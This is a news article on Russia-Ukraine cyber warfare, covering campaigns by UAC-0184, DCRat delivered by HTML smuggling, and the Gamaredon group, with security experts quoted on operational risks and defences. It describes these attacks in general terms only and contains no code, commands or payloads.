Ukraine-Russia Cyber Battles Tip Over Into the Real World
"Pig butchering," generative AI, and spear-phishing have all transformed digital warfare.
October 3, 2024
As the kinetic war between Russia and Ukraine persists, a parallel battle is being waged in cyberspace, where hackers are targeting critical infrastructure, government entities, and individual service personnel.
The cyber campaigns focus on espionage, disruption, and social engineering to weaken Ukrainian defenses and sow discord, with efforts to compromise personal data and infiltrate secure communication channels like Signal and Telegram.
Russian-aligned cyber actors, including advanced persistent threat (APT) groups like Gamaredon, have intensified their attacks since Russia's 2022 invasion of Ukraine.
Despite Ukrainian efforts to bolster cybersecurity, Russian hackers continue to refine their tools, and Russian cyber warfare tactics are varied and persistent, according to Ukraine's State Service of Special Communications and Information Protection (SSSCIP) September report.
These are just a few of the latest examples of cyberwarfare between the two states, though other additional malware perpetrators and cyberattack units, including Sandworm (aka APT44), continue to proliferate.
Messaging Apps Target Service Members
One recent campaign involves the Russia-aligned UAC-0184 group targeting Ukrainian military personnel through messaging apps, including Signal.
Hackers impersonate familiar contacts, sending malicious files disguised as combat footage or recruitment material to infect devices with malware.
Dan Black, manager, Mandiant Cyber Espionage Analysis, Google Cloud, says common technologies like smartphones and tablets have become essential tools for military personnel on the front lines, providing real-time intelligence and other critical support capabilities.
"But their utility cuts both ways," he cautions.
Because they provide such valuable capability, penetrating these devices can provide an adversary a surreptitious lens into various types of sensitive battlefield information that can have grave, even lethal, consequences for targets if compromised.
Abu Qureshi, head of threat research for BforeAI, explains targeted cyberattacks aimed at military personnel through messaging apps can severely compromise operational security.
"By intercepting communications or distributing malware through trusted communication channels, attackers can extract sensitive data on the physical locations of personnel," Qureshi says. "This can lead to real-world consequences."
Malachi Walker, security adviser for DomainTools, adds a targeted cyberattack such as what’s being seen in the Russian/Ukrainian war is like pig-butchering attacks the team has observed in the financial service sector, where an attacker builds a personal relationship with their victim, gaining their trust over a period to gain a payout.
"Seeing this tactic used in warfare, rather than for financial gain, impacts the operational security of a military unit," Walker explains.
He says while a financially motivated pig-butchering attack can only leave one victim, using this technique in a war setting could place an entire group of soldiers in danger.
Adam Gavish, co-founder and CEO at DoControl, says what's particularly concerning is that many of these troops have access to sensitive intelligence and critical systems.
"A successful attack could potentially compromise not just individual soldiers, but entire military operations or strategies," he says.
The ripple effects of a single breach could harm many, making these personalized attacks especially dangerous.
"All of this can significantly impact combat effectiveness, readiness, and overall military capabilities," Gavish says.
Russian-Speaking Users Targeted
Meanwhile, the DCRat Trojan has been deployed through HTML smuggling, marking a shift in delivery methods to target Russian-speaking users.
HTML smuggling techniques can bypass traditional security measures by nesting attacks within obfuscation layers like files, posing a significant threat to critical industries during conflicts.
Walker explains the use of HTML smuggling may not be the sole cause for change in the threat landscape, but it is indicative of an ongoing change that his team has observed in the past two years.
"The evolution of cyberattacks and malware, particularly those that have an intersection with the use of generative AI, have lowered the barrier for entry for threat actors, leading to more threats and a greater volume of attacks," he says.
DCRat and other similar malware can infiltrate systems controlling power grids, oil pipelines, and even nuclear facilities, which could severely disrupt the safety of any nation. "In the context of targeting Russian-speaking users and Russian companies, such attacks could have an impact that extends to other countries and companies and leads to further distrust," Walker adds.
He notes not all Russian companies are sanctioned by NATO-allied countries and those not sanctioned could be the most appealing targets as it would allow these threat actors to extend their reach.
These impacts can have a global impact including the delay of delivery for essential goods and the compromise of critical industries like energy, healthcare, financial services, and transportation.
Stephen Kowski, field chief technology officer (CTO) at SlashNext Email Security+, says this method of attack highlights the need for more sophisticated defense strategies that go beyond conventional antivirus solutions.
"When looking at this phishing technique you need live analysis of malicious content within the file and that is why you cannot rely on signature-based, feeds-based phishing protection alone," he explains.
He adds securing industrial control systems is paramount in preventing disruptions that could amplify physical attacks.
"A comprehensive approach involving regular security audits, network segmentation, and robust access controls can help safeguard energy infrastructure against supply chain attacks," Kowski says.
Game on for Gamaredon
An ESET report released last month focused on the 2022 and 2023 campaigns of Gamaredon, one of the most active groups in Ukraine.
The group has been conducting spear-phishing campaigns and using custom malware to breach Ukrainian government institutions, with the attacks undergoing constant evolution — for example, shifting to PowerShell and VBScript-based attacks.
DoControl's Gavish says Gamaredon's persistent approach, while less stealthy, can be highly effective in overwhelming Ukraine's defenses through sheer volume.
"This constant barrage of attacks ties up cybersecurity resources and increases the chances of a successful breach simply through persistence," he says. The real-world impact forces Ukraine to constantly divert resources to cyber defense. "Gamaredon's attempts to target NATO countries have significant implications for international cybersecurity cooperation," Gavish adds.
From his perspective, these types of threats highlight the need for increased information sharing and joint defense strategies among allied nations. "The situation in Ukraine serves as a stark reminder that cybersecurity is not just an IT issue — it's a matter of national security with very real-world consequences," Gavish says.
About the Author
You May Also Like
Transform Your Security Operations And Move Beyond Legacy SIEM
Nov 6, 2024Unleashing AI to Assess Cyber Security Risk
Nov 12, 2024Securing Tomorrow, Today: How to Navigate Zero Trust
Nov 13, 2024The State of Attack Surface Management (ASM), Featuring Forrester
Nov 15, 2024Applying the Principle of Least Privilege to the Cloud
Nov 18, 2024